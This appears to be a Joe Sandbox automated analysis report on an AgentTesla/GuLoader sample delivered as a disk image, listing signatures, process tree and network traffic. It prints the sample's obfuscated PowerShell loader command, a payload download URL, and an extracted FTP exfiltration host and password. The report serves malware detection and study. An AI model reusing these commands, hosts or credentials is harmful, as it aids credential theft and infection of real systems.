Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ze1Ueabtx5.img

Overview

General Information

Sample name:Ze1Ueabtx5.img
renamed because original name is a hash value
Original sample name:2a8d91f4633e838069bd4d2e4f90cf83327bae4efb9442f23198e40676c55096.unknown
Analysis ID:1518114
MD5:de10bad1ae168cd0c81afb61723464ac
SHA1:a5e93224048e0681278eab54ff273068bbb56289
SHA256:2a8d91f4633e838069bd4d2e4f90cf83327bae4efb9442f23198e40676c55096
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7460 cmdline: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7544 cmdline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • Documenti di spedizione 0009333000459595995.exe (PID: 7784 cmdline: "E:\Documenti di spedizione 0009333000459595995.exe" MD5: 6C446FD0A3F6D498F5CBD0725CE7F232)
    • powershell.exe (PID: 7816 cmdline: "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wabmig.exe (PID: 2124 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000006.00000002.2470285181.0000000009291000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: wabmig.exe PID: 2124JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious PowerShell Parameter Substring
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), ProcessId: 7544, ProcessName: powershell.exe
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7816, TargetFilename: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), ProcessId: 7544, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T12:35:49.297316+020028032702Potentially Bad Traffic192.168.2.449737185.29.11.5380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://ftp.concaribe.comAvira URL Cloud: Label: malware
            Found malware configuration
            Source: cmd.exe.7460.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2465970106.000000000760E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2469658743.000000000882C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000006.00000002.2465970106.000000000760E000.00000004.00000020.00020000.00000000.sdmp
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\userJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: Joe Sandbox ViewIP Address: 192.185.13.234 192.185.13.234
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 185.29.11.53:80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bIGuEflfnZjESw74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.29.11.53Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bIGuEflfnZjESw74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.29.11.53Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ftp.concaribe.com
            Source: wabmig.exe, 0000000B.00000002.3010634020.0000000023A30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://185.29.11.53/bIGuEflfnZjESw74.bin
            Source: wabmig.exe, 0000000B.00000002.2999110092.00000000088B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.11.53/bIGuEflfnZjESw74.binf;c
            Source: wabmig.exe, 0000000B.00000002.2999110092.00000000088B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.11.53/bIGuEflfnZjESw74.binj;W
            Source: wabmig.exe, 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://concaribe.com
            Source: powershell.exe, 00000006.00000002.2460083974.00000000031B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: wabmig.exe, 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.concaribe.com
            Source: Documenti di spedizione 0009333000459595995.exe, 00000005.00000002.1792758613.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Documenti di spedizione 0009333000459595995.exe, 00000005.00000000.1768071577.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ze1Ueabtx5.img, Documenti di spedizione 0009333000459595995.exe.2.dr, Documenti di spedizione 0009333000459595995.exe.6.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000006.00000002.2460639566.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000006.00000002.2460639566.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exeJump to dropped file
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile created: C:\Windows\SysWOW64\sennepssovsenJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe 8A149E1DED1CCE5485B9783687DD8F94C2F3926EDD17E62A682FE56CC73B1AE4
            Source: classification engineClassification label: mal100.troj.spyw.evad.winIMG@10/18@2/3
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\tmp.logJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyckhu3o.ytd.ps1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
            Source: unknownProcess created: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe "E:\Documenti di spedizione 0009333000459595995.exe"
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)Jump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: uxtheme.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: userenv.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: apphelp.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: propsys.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: dwmapi.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: cryptbase.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: oleacc.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: ntmarta.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: version.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: shfolder.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: windows.storage.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: wldp.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: profapi.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: riched20.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: usp10.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: msls31.dllJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: textinputframework.dllJump to behavior
